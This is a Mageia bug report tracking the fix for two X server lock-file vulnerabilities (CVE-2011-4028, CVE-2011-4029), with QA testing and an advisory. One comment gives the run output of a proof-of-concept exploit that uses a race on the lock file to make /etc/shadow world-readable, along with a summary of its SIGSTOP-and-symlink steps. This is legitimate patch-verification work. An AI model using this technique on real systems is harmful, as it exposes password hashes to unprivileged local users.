3102 – CVE-2011-4028, CVE-2011-4029: xserver locking code issues

Bug 3102 - CVE-2011-4028, CVE-2011-4029: xserver locking code issues

Summary: CVE-2011-4028, CVE-2011-4029: xserver locking code issues

Status:	RESOLVED FIXED

Alias:	None

Product:	Mageia
Classification:	Unclassified
Component:	Security (show other bugs)
Version:	1
Hardware:	All Linux

Priority:	Normal Severity: normal
Target Milestone:	---
Assignee:	QA Team
QA Contact:

URL:
Whiteboard:
Keywords:	validated_update

Depends on:
Blocks:

Reported:	2011-10-18 21:21 CEST by Nicolas Vigier
Modified:	2012-01-04 13:33 CET (History)
CC List:	4 users (show)

See Also:
Source RPM:	x11-server
CVE:
Status comment:

Attachments
POC for CVE-2011-4029 (5.46 KB, text/x-csrc) 2012-01-03 14:26 CET, claire robinson	Details
View All Add an attachment (proposed patch, testcase, etc.)

Description Nicolas Vigier 2011-10-18 21:21:15 CEST

From this mail :
http://lists.freedesktop.org/archives/xorg-announce/2011-October/001744.html

Two vulnerabilities have been discovered in the code handling the X
server lock, that forbids two X servers from serving the same display
simultaneously.

o CVE-2011-4028 : File disclosure vulnerability:
  It is possible to deduce if a file exists or not by exploiting the
  way that Xorg creates its lock files.

  This is caused by the fact that the X server is behaving differently
  if the lock file already exists as a symbolic link pointing to an
  existing or non-existing file.

o CVE-2011-4029 : File permission change vulnerability:
  It is possible for a non-root user to set the permissions for
  all users on any file or directory to 444, giving unwanted read
  access or causing denies of service (by removing execute permission).
  This is caused by a race between creating the lock file and setting
  its access modes.


Fix
- ---

Those issues have been fixed by the following two git commits:

CVE-2011-4028: 6ba44b91e37622ef8c146d8f2ac92d708a18ed34
http://cgit.freedesktop.org/xorg/xserver/commit/?id=6ba44b91e37622ef8c146d8f2ac92d708a18ed34

CVE-2011-4029: b67581cf825940fdf52bf2e0af4330e695d724a4
http://cgit.freedesktop.org/xorg/xserver/commit/?id=b67581cf825940fdf52bf2e0af4330e695d724a4

Comment 1 Manuel Hiebel 2011-11-11 01:36:50 CET

Ping ?

Comment 2 Thierry Vignaud 2011-11-22 13:24:25 CET

I've no time for this

Assignee: thierry.vignaud => security

Comment 3 Manuel Hiebel 2011-12-06 02:02:48 CET

Ping ?

Comment 4 D Morgan 2012-01-01 23:32:59 CET

i look this one

CC: (none) => dmorganec

Comment 5 D Morgan 2012-01-01 23:51:58 CET

pushed in updates_testing fixing the 2 CVE

Assignee: security_officers => qa-bugs

Comment 6 claire robinson 2012-01-03 14:26:23 CET

Created attachment 1325 [details]
POC for CVE-2011-4029

There are instructions in the file, not tried it yet though.

Comment 7 claire robinson 2012-01-03 14:40:05 CET

POC does work as intended and shows we are vulnerable

Testing x86_64


Before
------
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 3877 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 3877 resumed (SIGCONT sent)
[+] Attack succeeded, ls -l /etc/shadow:
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

$ ll /etc/shadow
-r--r--r-- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

Undoing it..

$ su -c "chmod 440 /etc/shadow" -
Password:
$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow


After
-----

The following 3 packages are going to be installed:

- x11-server-common-1.10.1-1.1.mga1.x86_64
- x11-server-devel-1.10.1-1.1.mga1.x86_64
- x11-server-xorg-1.10.1-1.1.mga1.x86_64

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow
$ ./xchmod /etc/shadow
[+] Trying to stop a Xorg process right before chmod()
[+] Process ID 5223 stopped (SIGSTOP sent)
[+] Removing /tmp/.tX1-lock by launching another Xorg process
[+] Creating evil symlink (/tmp/.tX1-lock -> /etc/shadow)
[+] Process ID 5223 resumed (SIGCONT sent)
[-] Attack failed, rights are 100440.  Try again!

$ ll /etc/shadow
-r--r----- 1 root shadow 1174 Jan  3 11:14 /etc/shadow

Comment 8 Dave Hodgins 2012-01-03 23:58:41 CET

Testing complete on i586.

Could someone from the sysadmin team push the srpm
x11-server-1.10.1-1.1.mga1.src.rpm
from Core Updates Testing to Core Updates.

Advisory:  This security update for x11-server corrects the following two
vulnerabilities have been discovered in the code handling the X
server lock, that forbids two X servers from serving the same display
simultaneously.

o CVE-2011-4028 : File disclosure vulnerability:
  It is possible to deduce if a file exists or not by exploiting the
  way that Xorg creates its lock files.

  This is caused by the fact that the X server is behaving differently
  if the lock file already exists as a symbolic link pointing to an
  existing or non-existing file.

o CVE-2011-4029 : File permission change vulnerability:
  It is possible for a non-root user to set the permissions for
  all users on any file or directory to 444, giving unwanted read
  access or causing denies of service (by removing execute permission).
  This is caused by a race between creating the lock file and setting
  its access modes.

https://bugs.mageia.org/show_bug.cgi?id=3102

Keywords: (none) => validated_update
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 9 Thomas Backlund 2012-01-04 13:33:04 CET

Update pushed.

Status: NEW => RESOLVED
CC: (none) => tmb
Resolution: (none) => FIXED

Note You need to log in before you can comment on or make changes to this bug.